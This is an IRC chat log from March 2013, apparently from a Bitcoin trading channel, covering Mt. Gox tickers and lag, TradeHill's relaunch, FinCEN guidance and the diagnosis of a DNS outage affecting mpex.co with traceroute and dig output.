24 hour high: 52.87500, 24 hour vwap: 49.02600 Mar 19 02:16:04 ;;goxlag Mar 19 02:16:05 44.277889 seconds Mar 19 02:16:07 damn Mar 19 02:16:14 Looks like 5000 BTC getting bounced from addresss to address with 2BTC missing each time Mar 19 02:16:16 gox just took a gigantic crap Mar 19 02:16:30 ough Mar 19 02:16:33 Bugpowder check out the 6k ish txns Mar 19 02:16:33 50 wall gone Mar 19 02:16:41 addy 1 sends to 2 sends to 3 sends to 4 Mar 19 02:16:43 same btc Mar 19 02:16:47 yea Mar 19 02:16:48 yeah something like 6500 upto 7600 Mar 19 02:16:51 OH YES! Mar 19 02:17:00 THat was the wall at 54 Mar 19 02:17:05 he sold to market Mar 19 02:17:12 54 wall is gone now. Up we go Mar 19 02:17:22 ;;ticker Mar 19 02:17:23 BTCUSD ticker | Best bid: 50.83101, Best ask: 51.11538, Bid-ask spread: 0.28437, Last trade: 51.29899, 24 hour volume: 66200.90710021, 24 hour low: 47.12009, 24 hour high: 52.87500, 24 hour vwap: 49.02600 Mar 19 02:17:28 stale Mar 19 02:17:33 ;;goxlag Mar 19 02:17:35 19.91481 seconds Mar 19 02:17:41 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Mar 19 02:17:41 that seems to be up to date Mar 19 02:17:57 thx, wow Mar 19 02:18:02 ;;ticker Mar 19 02:18:03 BTCUSD ticker | Best bid: 50.20001, Best ask: 50.80000, Bid-ask spread: 0.59999, Last trade: 50.20001, 24 hour volume: 70775.46761279, 24 hour low: 47.12009, 24 hour high: 52.87500, 24 hour vwap: 49.16174 Mar 19 02:18:14 $50 is the new paradigm Mar 19 02:18:15 maybe its not stale... looks right Mar 19 02:18:22 $50 is the OLD paradigm Mar 19 02:18:33 Bugpowder is right Mar 19 02:18:35 How many russians are thinking of putting 1% in bitcoin. Mar 19 02:18:36 $50 is the new 5 Mar 19 02:18:56 the number in here listening Bugpowder Mar 19 02:19:32 ssssshhhhhh, were hunting bitcoin... wascally bitcoin Mar 19 02:21:52 ;;ticker Mar 19 02:21:53 BTCUSD ticker | Best bid: 50.53002, Best ask: 50.82998, Bid-ask spread: 0.29996, Last trade: 50.52002, 24 hour volume: 70828.14155647, 24 hour low: 47.12009, 24 hour high: 52.87500, 24 hour vwap: 49.16342 Mar 19 02:22:02 ;;goxlag Mar 19 02:22:06 27.051584 seconds Mar 19 02:24:21 are there any good charts of goxlag? Mar 19 02:24:44 charts of goxlag? hahh Mar 19 02:24:55 it should be done Mar 19 02:24:56 it could be used as an indicator Mar 19 02:25:00 yea Mar 19 02:25:16 of transient value Mar 19 02:25:21 given recent biz moves Mar 19 02:25:26 tradehill looks like their down - soiled themselves already... Mar 19 02:25:34 lmao pgp Mar 19 02:25:48 the adults has left the playground ? Mar 19 02:25:54 lol Mar 19 02:26:14 only adults have crossed order books... Mar 19 02:26:30 at least that never happens on gox... lol Mar 19 02:27:04 ;;ticker Mar 19 02:27:06 BTCUSD ticker | Best bid: 50.79898, Best ask: 50.79899, Bid-ask spread: 0.00001, Last trade: 50.79898, 24 hour volume: 71294.17494196, 24 hour low: 47.12009, 24 hour high: 52.87500, 24 hour vwap: 49.17302 Mar 19 02:27:41 ;;goxlag Mar 19 02:27:41 12.907513 seconds Mar 19 02:27:58 is it unreasonable to ask for goxlag in the ticker? Mar 19 02:28:24 how it it that bitcoinity is updating and gox's US "Partner" coinlab isn't... Mar 19 02:28:40 < benkay> is it unreasonable to ask for goxlag in the ticker? << nanotube Mar 19 02:29:01 betcha that bitcoinity could do some sort of gox lag chart... Mar 19 02:29:29 ;;ticker Mar 19 02:29:30 BTCUSD ticker | Best bid: 50.79898, Best ask: 50.79899, Bid-ask spread: 0.00001, Last trade: 50.79898, 24 hour volume: 71294.17494196, 24 hour low: 47.12009, 24 hour high: 52.87500, 24 hour vwap: 49.17302 Mar 19 02:29:36 ywan Mar 19 02:29:42 back 2 work Mar 19 02:35:11 ;;goxlag Mar 19 02:35:12 0.430566 seconds Mar 19 02:36:02 not bad Mar 19 02:36:04 ;;ticker Mar 19 02:36:05 BTCUSD ticker | Best bid: 50.79980, Best ask: 50.85000, Bid-ask spread: 0.05020, Last trade: 50.85000, 24 hour volume: 71804.32426947, 24 hour low: 47.12009, 24 hour high: 52.87500, 24 hour vwap: 49.19010 Mar 19 02:36:14 yep. "new paradigm" Mar 19 02:36:16 boring Mar 19 02:36:22 99$ or gtfo Mar 19 02:48:26 oldie but goodie re: BTC exchanges: http://tinyurl.com/5t4xqq4 Mar 19 02:50:44 asciilifeform was discussed here just a day or two ago Mar 19 02:53:56 mircea_popescu: damn. got a log? Mar 19 02:54:06 ya 1 sec Mar 19 02:56:35 asciilifeform http://pastebin.com/v3JxJqy5 aka nothing Mar 19 02:56:43 i guess "discussed" was a misnomer. Mar 19 02:56:59 [BTCTC] [BTC-BOND] 1 @ 0.009998 BTC [-] Mar 19 02:58:18 mircea_popescu: not much of a refutation now, was it? Mar 19 02:58:30 not something that can in principle be refuted, is it ? Mar 19 02:58:48 not so sexy now is it Mar 19 02:59:21 mircea_popescu: not so sure about that. it might be possible to measure traffic to, say, mtgox, indirectly (without being in control of mtgox) Mar 19 02:59:27 [BTCTC] [ASICMINER-PT] 3 @ 0.84 = 2.52 BTC [-] Mar 19 02:59:29 say, by measuring ping time Mar 19 02:59:47 asciilifeform you can measure (a good portion of) mpex's inbound btc, for that matter. Mar 19 02:59:49 does it help you ? Mar 19 02:59:50 and see exactly how it correlates with price moves Mar 19 03:00:11 this is an open problem generally, there's even a serious bounty out for a certain formulation of it Mar 19 03:00:26 mircea_popescu: that wouldn't do the trick, necessarily. presumably they have plenty of BTC in house to absorb the "noise" Mar 19 03:00:29 http://trilema.com/2013/the-question-of-the-year-in-btc/ (s.dice version) Mar 19 03:01:12 there's like 5k bucks waiting to be won by some clever chap there Mar 19 03:02:17 mircea_popescu: I might take you up on that challenge. Mar 19 03:07:10 https://www.youtube.com/watch?v=ufXdcKWrmSM Mar 19 03:07:22 Asset Protection, Privacy and Bitcoin for Solo Entrepreneurs Part 1/8 Mar 19 03:16:05 what bullshit is this Mar 19 03:16:10 "you can become a 'pt'" Mar 19 03:16:33 one does not simply walk into passthrough Mar 19 03:16:47 - perpetual thinker, - permanent tourist, - possibility thinker - privacy techincian, - pirate pass through Mar 19 03:17:12 proffessional thetan? Mar 19 03:17:35 hahaha wait. tradehill is back ON THE MPEX MODEL ? Mar 19 03:17:36 thetan - lol! Mar 19 03:17:36 lmao Mar 19 03:17:54 oh shut up Mar 19 03:18:05 Every client will receive a $75 credit to test trading and can activate an account with a deposit of at least $10,000, 200 Bitcoins, or $5,000 in Mt. Gox codes. Mar 19 03:18:05 Read more at http://venturebeat.com/2013/03/18/embattled-bitcoin-exchange-tradehill-is-back/#kOC57bZHlphBM98A.99 Mar 19 03:18:14 need at least 10k to play. Mar 19 03:18:24 lol Mar 19 03:18:51 i give 2.5 btc for 50btc account Mar 19 03:18:54 5k really... Mar 19 03:18:54 which is like Mar 19 03:19:02 twice dat. Mar 19 03:19:07 funny shit what these adults are up to over there. Mar 19 03:19:50 give us a million and you get free cookie Mar 19 03:19:57 I'm embarassed for them... Mar 19 03:20:06 sales pitch. Mar 19 03:20:55 cleaned out their book , I see... My, my, what DEEP pool of liquidity they have... Mar 19 03:21:59 from the comments; Mar 19 03:22:50 Ryan Singer > Kurt Durjan • 9 hours ago − Mar 19 03:22:50 ↓ Mar 19 03:22:50 Hi Kurt, Mar 19 03:22:50 Please email us at claim@tradehill.com and I will put you in touch with the person doing payouts for the old company Mar 19 03:22:50 --- Mar 19 03:22:50 rofl. Mar 19 03:22:59 yikes... crossed order book is back! Mar 19 03:24:12 what a joke... Mar 19 03:24:45 are those sell orders @ 50 supposed to be AON orders or something - still doesn't make sense... Mar 19 03:24:49 kakobrekla lol win Mar 19 03:24:55 "the person doing payouts for the old company" Mar 19 03:25:07 which isn't the dorks in the pic nor anything named tradehill Mar 19 03:25:26 the problem is to an outsider Mar 19 03:25:27 fuck it, i'm blogging this Mar 19 03:25:30 this is all nice and ok Mar 19 03:25:33 yeah. Mar 19 03:25:55 we need some press site with some powah Mar 19 03:26:33 book finally uncrossed... more lag than gox? Mar 19 03:26:55 $coinlablag Mar 19 03:27:02 or sumtn Mar 19 03:27:09 awesome! $1.50 spread Mar 19 03:27:27 oops book gone again Mar 19 03:28:25 thes end of the world once per week on these exchanges Mar 19 03:28:31 theres* Mar 19 03:33:21 mpex.co is down Mar 19 03:34:00 oh? Mar 19 03:34:02 is not Mar 19 03:34:07 indeed it is... Mar 19 03:34:15 sweet Mar 19 03:34:16 :D Mar 19 03:34:26 HAVOC! Mar 19 03:34:42 opens for me? Mar 19 03:34:58 coinbr seems fine Mar 19 03:35:43 but not http://mpex.coinbr.com/ or http://mpex.co/ Mar 19 03:35:56 yeah, i'm not seeing any issue Mar 19 03:36:02 $depth Mar 19 03:36:05 smickles: http://pastebin.com/raw.php?i=WUXa2LWs Mar 19 03:36:18 and mpex proper is still there Mar 19 03:36:35 no i can sleep Mar 19 03:36:38 now Mar 19 03:36:48 pgp: if you're still having issues with the websites, use assbot or mpexbot Mar 19 03:37:35 not a problem for me right now, just noting that website it inaccessible... Mar 19 03:37:54 they are both down,404.doesnt matter to me but just to let you know Mar 19 03:38:12 weird, they are both up for me Mar 19 03:38:30 jborkl: where abouts are you Mar 19 03:38:37 i'm in SW 'merica Mar 19 03:38:40 knowmultiple ip,same 404 errors on al Mar 19 03:38:43 all Mar 19 03:38:48 im in nyc Mar 19 03:39:00 alalltexas Mar 19 03:39:06 damn phone Mar 19 03:39:13 ahh, mpex.coinbr.com 404 now Mar 19 03:39:35 mpexbot should work even if mpex.co is down Mar 19 03:39:43 the same with assbot iirc Mar 19 03:40:07 mircea_popescu: are you seeing this? Mar 19 03:40:29 yah its down Mar 19 03:40:29 i am Mar 19 03:40:31 $vwap Mar 19 03:40:35 mircea_popescu: http://pastebin.com/raw.php?i=Uq6Ck9w2 Mar 19 03:40:45 aha. Mar 19 03:40:52 mpex.co isn't down ftr. Mar 19 03:41:25 woah, Mar 19 03:41:35 mpexbot is getting a lot of network.in Mar 19 03:41:38 http://www.downforeveryoneorjustme.com/mpex.co Mar 19 03:41:38 also Mar 19 03:41:55 i wonder if this is the early phase lessee here Mar 19 03:42:33 Load Averages 0.07 0.08 0.08 on the proxies. Mar 19 03:43:15 8 - 9 requests/sec. really niot seeing an issue atm Mar 19 03:44:10 down for me Mar 19 03:44:38 down for me also. :-/ Mar 19 03:45:12 mpexbot's load average is up to 0.08 Mar 19 03:45:19 highest it's ever been Mar 19 03:45:30 well folks, some tracerts might be useful Mar 19 03:46:15 48 min since last block mined Mar 19 03:46:45 174.127.72.233/mpex/ << direct addressing also if it's a local dns issue/poisoning Mar 19 03:46:53 FORK ? #troll Mar 19 03:47:15 mircea_popescu: traceroute ends at 173.192.118.141 ( po2.fcr02.sr02.dal05.networklayer.com ) Mar 19 03:47:15 also, Mar 19 03:47:16 $proxies Mar 19 03:47:18 mircea_popescu: ["http://mpex.co", "http://mpex.ws", "http://mpex.bz", "http://mpex.coinbr.com", "http://mpex6.coinbr.com"] Mar 19 03:47:27 mpex.ws mpex.bz same story ? Mar 19 03:47:31 mp - that doesn't work either Mar 19 03:47:34 hrm.. Mar 19 03:47:53 no1 Mar 19 03:47:56 .bz works Mar 19 03:48:15 !ticker mpex s.dice Mar 19 03:48:16 [MPEX:S.DICE] 1D: 0.0051 / 0.0051 / 0.0051 (6227 shares, 31.76 BTC), 7D: 0.00444444 / 0.00514093 / 0.00599987 (75748 shares, 389.42 BTC), 30D: 0.00300001 / 0.00609733 / 0.0069 (2299780 shares, 14,022.52 BTC) Mar 19 03:48:21 mmh not for me, so ? DNS ? Mar 19 03:48:25 ;;ticker Mar 19 03:48:30 midnightmagic that's normal, it's the top level router of the dc Mar 19 03:48:37 proxies don't seem to work Mar 19 03:48:52 direct address dont work Mar 19 03:48:56 pgp you actually can't connect to what srsly ?! Mar 19 03:48:59 from DC Mar 19 03:49:17 mpex.ws doesn't resolve. same with mpex.bz, and.. hrm.. 216.182.224.87 (216.182.224.87) for the coinbr proxies. Mar 19 03:49:28 mircea_popescu: It's not normal for a traceroute to fail to traverse.. Mar 19 03:49:48 just sayin' - can't get to website... trying to offer datapoint from nyc area... Mar 19 03:49:49 to fail to traverse no Mar 19 03:49:52 mircea_popescu: Are you getting bent over by someone..? Mar 19 03:50:00 possibly tho it'd be in a very weird way Mar 19 03:50:03 .bz and .co works here Mar 19 03:50:11 the rest is dead Mar 19 03:50:18 mircea_popescu: My traceroute is from northern california.. Mar 19 03:50:25 http://who.is/whois/mpex.co sees it for instance Mar 19 03:50:31 downforeverone also sees it Mar 19 03:50:47 mircea_popescu: That might just be cached. (the whois part) Mar 19 03:50:49 maybe one of the letter dns servers got pouisoned ? Mar 19 03:50:59 Overview for mpex.co Mar 19 03:50:59 Updated: 1 second ago Mar 19 03:51:23 http://pastebin.com/DxCMxhDw Mar 19 03:51:25 mircea_popescu: Is this 174.127.72.233 mpex.co? Mar 19 03:51:28 yea Mar 19 03:51:39 mircea_popescu: Do you have access to a looking glass? Mar 19 03:51:43 dies here : po2.fcr02.sr02.dal05.networklayer.com (173.192.118.141) 131.070 ms Mar 19 03:51:49 i've got a server in california Mar 19 03:51:59 i'll tr from there Mar 19 03:52:31 hm Mar 19 03:53:30 DOJ cut the US cables to MPEX Mar 19 03:53:42 in wake of FinCEN guidance Mar 19 03:53:52 lol Mar 19 03:54:13 smickles: Does your upstream give you bgp looking glass access? Mar 19 03:54:54 Actually, the DC Level 3 ip tried for 50 secondes then sent it thru Dallas, where it also failed. Mar 19 03:55:11 it would certainly be interesting if it were part of something deliberate. :-/ Mar 19 03:55:14 5 seconds Mar 19 03:55:18 1 2 0 0 8.9.232.73 xe-5-3-0.edge3.dallas1.level3.net Mar 19 03:55:18 2 Timed out 1 0 4.69.145.204 ae-4-90.edge2.dallas3.level3.net Mar 19 03:55:18 3 7 7 7 4.59.36.94 softlayer-t.edge2.dallas3.level3.net Mar 19 03:55:18 4 8 7 8 50.97.18.195 ae6.dar01.sr01.dal05.networklayer.com Mar 19 03:55:18 5 10 8 7 173.192.118.139 po1.fcr02.sr02.dal05.networklayer.com Mar 19 03:55:18 6 8 8 8 174.127.72.233 174.127.72.233.static.midphase.com Mar 19 03:55:18 Trace complete Mar 19 03:55:23 i get it from dallas just fine for instance Mar 19 03:55:35 http://174.127.72.233/ comes up for me showing some Romanian hauling luggage... Mar 19 03:55:51 pgp haha cool. Mar 19 03:55:58 except it's a guatemalan. Mar 19 03:56:50 midnightmagic: i'm so noob on this topic, i don't even know Mar 19 03:56:50 smickles: Okay. Mar 19 03:56:50 my cali traceroute didn't look special Mar 19 03:56:50 still hanging at po2.fcr02.sr02.dal05.networklayer.com (173.192.118.141) 89.246 ms Mar 19 03:56:50 it must be in a different part Mar 19 03:56:50 maybe iran screwed their bgp advertisements up again Mar 19 03:56:50 that would be funny. Mar 19 03:56:53 172.127.72.233 loads for me... text only, but the /mpex does not Mar 19 03:57:17 text only? you're looking at the site as intended Mar 19 03:57:21 ;) Mar 19 03:57:25 lol. Mar 19 03:57:26 lol Mar 19 03:57:34 for my curiosity, if you edit your hosts to read Mar 19 03:57:40 are you sure? Mar 19 03:57:44 174.127.72.233 mpex.co Mar 19 03:57:50 does it suddenly work fine ? Mar 19 03:58:18 (bind may need restart, or masq or w/e the dns is) Mar 19 03:59:33 $vwap Mar 19 03:59:36 mircea_popescu: http://pastebin.com/raw.php?i=6J3qFf1L Mar 19 04:02:23 although 174.127.72.233/mpex.co/ does resolve... Mar 19 04:02:29 ;;goxlag Mar 19 04:02:49 the google translator has the article beginning with "May be the reasons explained when talking about behavioral deviations , or if it is not of course a conspiracy of blacks, Jews, Masons, English and former wives . It is true that I lean toward the first explanation, "What do I know?" Mar 19 04:02:57 dafuq Mar 19 04:03:04 nanotube, gribble forgot -asset Mar 19 04:03:05 s Mar 19 04:04:23 fascinating material - really... Mar 19 04:05:13 pgp lol cool Mar 19 04:07:30 I'm sure google isn't capturing the nuance of message... Mar 19 04:07:53 :p Mar 19 04:08:14 anyway, i've told sysadmin ppls, see what they come up with Mar 19 04:08:38 dos again? Mar 19 04:09:07 you should stick some soa elsewhere so we can at least tell when you're gettign dosed Mar 19 04:09:43 dub best i can tell there's some dns poisoning going on Mar 19 04:10:14 also fuck .co Mar 19 04:10:18 so use .ws Mar 19 04:10:52 dub does 174.127.72.233/mpex.co/ resolve for you ? Mar 19 04:11:01 although lumping in "former housewives" (or should it just be former wives) in with blacks, jew, mason and... english does strike me as subtly genius on a level that I'm not quite sure I understand.... Mar 19 04:11:18 pgp gimme a link i might make some sense of it Mar 19 04:11:20 um I don't think thats teh right question Mar 19 04:11:40 ya ok. does it bring up a page ? Mar 19 04:11:45 I can reach 174.127.72.233 Mar 19 04:11:55 right. Mar 19 04:12:06 if you update your dns to have mpex.co resolve there you're good to go. Mar 19 04:12:11 174.127.72.233/mpex.co/ is a 302 to http://trilema.com/ Mar 19 04:12:25 and polimedia is not resolving Mar 19 04:12:33 hum Mar 19 04:13:03 polimedia.us not resolving Mar 19 04:13:05 http://174.127.72.233/~polimedi/bitcoin/ << what does that do ? Mar 19 04:13:25 resolvingyes Mar 19 04:13:26 it shows mpex Mar 19 04:13:36 mkay. Mar 19 04:13:59 http://174.127.72.233/~polimedi/bitcoin/ yes it does! Mar 19 04:14:02 not clear if intentional or accidental, if directed at mpex or just affecting some users, but the dns's are borkt. Mar 19 04:14:07 your problem is the soa is unreachable Mar 19 04:14:10 for some people (not for all) Mar 19 04:14:50 well your soa records are on your domain Mar 19 04:14:54 which is broken Mar 19 04:15:29 if I cant resolve soa for polimedia.us im not goign to be able to ask ns1/2.polimedia.us how to get there Mar 19 04:15:31 dub you will have to have soa on some server. Mar 19 04:15:34 btw 174.127.72.233/mpex.co/ seems to resolve to random MP musings... Mar 19 04:15:41 if some user gets his dns fucked up and can't resolve that server Mar 19 04:15:45 it will appear unreachable. Mar 19 04:16:21 dub ns1/2 are registered as ns's tho, pretty much every dns server should know them by ip Mar 19 04:16:34 no Mar 19 04:16:35 I'm now getting: Moment poetic. Mar 19 04:16:35 Octombrie 25, 2010 | Autor: Mircea Popescu Mar 19 04:16:35 De-ai adormi iubito pe linia ferata Mar 19 04:16:35 Imbujorate trenuri te-or ocoli tiptil Mar 19 04:16:35 Din ceruri au sa ninga baloturi mari de vata Mar 19 04:16:35 Vor fi betii de roua, se va dansa cadril. Mar 19 04:17:08 pgp http://www.youtube.com/watch?v=pHrt7Fc99Eo there. with music. Mar 19 04:17:24 mircea_popescu: they will cache them for however long you instruct them to, then they will have to ask you again Mar 19 04:17:29 dub right. Mar 19 04:17:37 but only after someone asks them Mar 19 04:17:41 right. Mar 19 04:18:14 anyone this doesnt work for do: dig +trace polimedia.us Mar 19 04:18:24 for me there is no 'glue' in the root Mar 19 04:18:53 ;; Received 228 bytes from 127.0.0.1#53(127.0.0.1) in 49 ms Mar 19 04:18:53 us. 172800 IN NS k.cctld.us. Mar 19 04:18:53 us. 172800 IN NS e.cctld.us. Mar 19 04:18:53 us. 172800 IN NS c.cctld.us. Mar 19 04:18:53 us. 172800 IN NS f.cctld.us. Mar 19 04:18:53 us. 172800 IN NS a.cctld.us. Mar 19 04:18:53 us. 172800 IN NS b.cctld.us. Mar 19 04:18:53 Error: "Received" is not a valid command. Mar 19 04:19:08 sorry, yes there is Mar 19 04:19:43 ;; Received 98 bytes from 156.154.127.70#53(c.cctld.us) in 50 ms Mar 19 04:19:43 polimedia.us. 14400 IN A 174.127.72.233 Mar 19 04:19:43 Error: "Received" is not a valid command. Mar 19 04:19:44 it's there. Mar 19 04:20:29 mobile 4g service reaches it fine Mar 19 04:20:46 somebody fucked up their dns best i can determine atm. Mar 19 04:20:48 possibly l3 Mar 19 04:22:26 mp: your creation? Mar 19 04:22:26 ok back up on all ip tried Mar 19 04:22:26 mircea_popescu: anyway, use another domain for SOA Mar 19 04:22:44 polimedia IS another domain from mpex.co Mar 19 04:23:46 pgp nah Mar 19 04:24:24 lol Mar 19 04:25:57 except we cant reach mpex or polimedia Mar 19 04:26:32 http://www.webdnstools.com/dnstools/articles/glue_records Mar 19 04:26:39 so what'd a diff domain help ? Mar 19 04:26:44 NSA, grow up please ! Mar 19 04:27:08 Call the system administrator! Mar 19 04:27:18 PC Load Letter!?!? Mar 19 04:27:27 its been a long time since I gave a shit about dns so I cannot elucidate Mar 19 04:28:32 being 7 hours into a fault bridge dun't help Mar 19 04:29:27 suffice to say you have engineered yourself a spiffing spof there Mar 19 04:29:37 dig @a.cctld.us polimedia.us ANY << so if you dig here, you get the forward zone, its just the gtld-servers that don't return a valid pointer Mar 19 04:30:17 someone is doing something funny though Mar 19 04:31:28 same thing with this: dig @a.cctld.us mpex.co ANY Mar 19 04:32:02 they both have the same NS entries Mar 19 04:37:21 werid. Mar 19 04:37:37 mpexbot is still working as far as I can tell... Mar 19 04:37:42 I think his ns are just gettign hit Mar 19 04:38:48 ;;ticker m s.dice Mar 19 04:38:48 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid (1 more message) Mar 19 04:39:03 ticker m s.dice Mar 19 04:39:20 nope Mar 19 04:40:04 you gotta do: Mar 19 04:40:07 !ticker m s.dice Mar 19 04:40:09 [MPEX:S.DICE] 1D: 0.0051 / 0.0051 / 0.0051 (6227 shares, 31.76 BTC), 7D: 0.00444444 / 0.00514093 / 0.00599987 (75748 shares, 389.42 BTC), 30D: 0.00300001 / 0.00609733 / 0.0069 (2299780 shares, 14,022.52 BTC) Mar 19 04:40:18 and, yeah, i got a successful stat back Mar 19 04:40:20 thanks mod6 Mar 19 04:40:36 np Mar 19 04:41:11 what's strange is that even if they're blasting his NS's and trying to poison them, that shouldn't effect the gltd?? Mar 19 04:41:30 I dont think it is Mar 19 04:41:37 his ns are bork Mar 19 04:41:49 dig @63.247.64.93 polimedia.us ANY +short Mar 19 04:41:56 noerror but no record either Mar 19 04:42:22 but I'm seeing 25% PL to them too Mar 19 04:45:41 the obligatory tradehill bitchlsapping Mar 19 04:45:42 http://trilema.com/2013/children-and-their-delusions-today-jared-kenna-and-ryan-singer/ Mar 19 04:47:26 confirms that Chase Bank's website has indeed been hacked Mar 19 04:47:40 dub: hmm. yeah i guess us and cc have they're own tld servers. Mar 19 04:48:36 [BTCTC] [GSDPT] 1 @ 0.00499 BTC [+] Mar 19 04:50:50 *their Mar 19 04:50:50 doh! Mar 19 04:50:50 ;;asks 54 Mar 19 04:50:50 There are currently 2699.4102 bitcoins offered at or under 54.0 USD, worth 143185.579577 USD in total. | Data vintage: 0.0012 seconds Mar 19 04:51:12 those ripple weirdos, amirite? Mar 19 04:51:20 i thought we were evolving past debt-based economies Mar 19 04:51:32 ;;asks 60 Mar 19 04:51:32 There are currently 14956.903 bitcoins offered at or under 60.0 USD, worth 851660.539216 USD in total. | Data vintage: 50.4408 seconds Mar 19 04:51:35 some of us are trying to i now understand Mar 19 04:51:35 for the goats: http://youtu.be/LEP6-ICsjgg Mar 19 04:51:55 ahh i dont have flash installed :/ Mar 19 04:52:16 oh bummer, this is pretty funnay Mar 19 04:52:30 i like the guy @ 1:20 or so, cracks me up Mar 19 04:52:51 and by "guy" i mean the goat, not the actual human Mar 19 04:54:12 im about 50% of each Mar 19 04:54:22 mod6: lol you suck Mar 19 04:54:49 people on this call thinking im nuts now Mar 19 04:55:12 ;;asks 53 Mar 19 04:55:14 dub haha wat? Mar 19 04:55:22 There are currently 1728.8819 bitcoins offered at or under 53.0 USD, worth 91113.8927114 USD in total. | Data vintage: 0.0012 seconds Mar 19 04:56:46 anyway, i guess im just dusty Mar 19 04:57:01 cuz back in the day they didn't have fancy ass tld's like co, or us lol Mar 19 04:58:22 they are fail for drop shipping anyway Mar 19 04:58:48 if i was in the usa i would offer a much better service, i have shitloads of stuff in stock already Mar 19 04:58:48 some bureaucrats won at making bitcoin welcome in america Mar 19 04:59:02 who? Mar 19 04:59:06 how what? Mar 19 04:59:17 the fincen people Mar 19 04:59:20 or whatever their name is Mar 19 04:59:58 the way i see this is that some bureaucrats decided to let bitcoin grow on its own here Mar 19 05:00:23 im not in the loop i guess Mar 19 05:00:46 http://t.co/UclT7bCmSe Mar 19 05:00:49 hoho Mar 19 05:00:55 don't click that link if you value your privacy Mar 19 05:00:56 usa bitcoin companies are fucking idiots Mar 19 05:00:57 sorry Mar 19 05:01:04 you idiots Mar 19 05:01:20 *shrug* Mar 19 05:01:23 feel like herston at the end of planet of the apes Mar 19 05:01:29 you maniacs you blew it up Mar 19 05:01:37 heh Mar 19 05:01:49 why are yall worried? Mar 19 05:01:54 !ticker m s.bbet Mar 19 05:01:56 [MPEX:S.BBET] 1D: 0.0018 / 0.0018 / 0.0018 (17450 shares, 31.41 BTC), 7D: 0.0015 / 0.00189869 / 0.002014 (48750 shares, 92.56 BTC), 30D: 0.0015 / 0.00180983 / 0.002014 (135256 shares, 244.79 BTC) Mar 19 05:02:24 the usg has a tendency to overreact, and may yet Mar 19 05:02:35 but sometimes they let things be and try to just go after criminals Mar 19 05:02:40 infrequently Mar 19 05:02:55 because bitcoin is going get gang banged by western laws and regulation Mar 19 05:02:55 bah Mar 19 05:02:57 who cares Mar 19 05:02:59 by end of the year Mar 19 05:03:03 our government is like a pmsing older sister Mar 19 05:03:06 they will try Mar 19 05:03:08 and fail Mar 19 05:03:20 sometimes arbitrarily bitchy Mar 19 05:03:21 they will fail if you're not based in usa Mar 19 05:03:33 sometimes is like "hey kid have a joint" Mar 19 05:03:37 if your usa resident of usa bitcoin company consider yourself fucked Mar 19 05:03:43 or* Mar 19 05:03:50 how so bh? Mar 19 05:03:50 I disagree Mar 19 05:04:00 ++bugpowder Mar 19 05:04:02 licences Mar 19 05:04:02 Regulations cost money Mar 19 05:04:04 BUT Mar 19 05:04:04 tax Mar 19 05:04:21 VC's have money and may have been waiting for legal guidanc Mar 19 05:04:26 ok, dns poisoning should be clearing atm by special arrangementy Mar 19 05:04:29 i don't need to not pay taxes to live off bitcoins Mar 19 05:04:39 mp: sweet Mar 19 05:04:45 !ticker m s.mpoe Mar 19 05:04:45 [MPEX:S.MPOE] 1D: 0.00066743 / 0.00069359 / 0.00076717 (465282 shares, 322.72 BTC), 7D: 0.00066743 / 0.00071669 / 0.00077241 (2302852 shares, 1,650.44 BTC), 30D: 0.00061614 / 0.00070265 / 0.00078628 (40174787 shares, 28,229.00 BTC) Mar 19 05:05:00 The more clarity there is to the marketplace the more willing people are to invest and build companies Mar 19 05:05:06 i don't need to not pay taxes to build profitable businesses period. Mar 19 05:05:09 Bugpowder what's your read on the guidance ? Mar 19 05:05:13 just email the gov your wallet.dat file and give up Mar 19 05:05:14 seems overall very positive. Mar 19 05:05:19 Great news for users Mar 19 05:05:25 OK for miners Mar 19 05:05:38 great for network. forces miners to spend in-network. Mar 19 05:05:39 cause who really is gonna hunt u down over 25BTC Mar 19 05:05:46 guilds might have an issue Mar 19 05:05:48 "forces" Mar 19 05:05:49 the gov gave up on google and apple Mar 19 05:05:57 and now going after everyone else Mar 19 05:05:59 so breaking up guilds is kinda good too. BTCguild went over 40% Mar 19 05:06:09 yah, a hidden gift in there Mar 19 05:06:24 thank christ not a usa resident or usa bitcoin company Mar 19 05:06:26 i want to meet the people who wrote those regulations Mar 19 05:06:31 exchanges had to get cleanned up anyway Mar 19 05:06:40 Coinlab et al, is unclear. Could be a tougher road, but leaves a path open. Mar 19 05:06:55 On a more general note : the time of cowboy style, “one man and his hopes” fiat-BTC exchanges has passed. The exchange market is moving into a new phase. There is room on it for MtGox, on account of its old age and well known brand, and for people like the Frenchies doing that bitcoin-central partner-with-a-bank thing. All other exchanges are going out, and things being what they are the majority of them will be go Mar 19 05:06:55 ing out uncleanly. Mar 19 05:06:55 Because of this, keeping money in any other fiat-BTC exchanges than those two is pretty much cruisin’ for a bruisin’. Spot sellers may still be safe for a while, select ones may even be safe forever (as they’re a subset of the OTC style marketplace), but for better or worse cowboy exchanges are a thing of the past. Mar 19 05:07:00 i love quoting myself! Mar 19 05:07:00 A real company will be able to pass regs Mar 19 05:07:25 yeah i cant wait to use paypal's bitcoin service Mar 19 05:07:43 as a normal user it'll be perfect, bithub Mar 19 05:07:48 Dude. If you hold coins now Mar 19 05:07:51 its what they need Mar 19 05:07:54 i cant wait to have all the old dinosaur fucks involved Mar 19 05:07:56 and paypal starts a service Mar 19 05:08:00 you will be fucking rich Mar 19 05:08:01 except when they "freeze" your private key lol Mar 19 05:08:05 ^ that. Mar 19 05:08:13 yeah, but norms don't need to care about that Mar 19 05:08:21 ok just send me ur btc plz Mar 19 05:08:25 I'm done selling coins Mar 19 05:08:26 i dont know Mar 19 05:08:27 ;;ticker Mar 19 05:08:28 honestly Mar 19 05:08:28 BTCUSD ticker | Best bid: 51.74014, Best ask: 51.99996, Bid-ask spread: 0.25982, Last trade: 51.99998, 24 hour volume: 75673.06898668, 24 hour low: 47.20000, 24 hour high: 52.87500, 24 hour vwap: 49.44165 Mar 19 05:08:37 Regualtory pressure was my biggest worry Mar 19 05:08:38 if it hits 100 im cashing out for good Mar 19 05:08:41 and moving onto something else Mar 19 05:08:54 Bugpowder you're not alone let me tell you. Mar 19 05:08:55 like satoshi Mar 19 05:08:58 move onto it quickly before it gets raped by western laws and regulation Mar 19 05:09:15 i see a road to acceptance in america. Mar 19 05:09:21 Exactly Mar 19 05:09:26 it'll be hard and it'll take leadership Mar 19 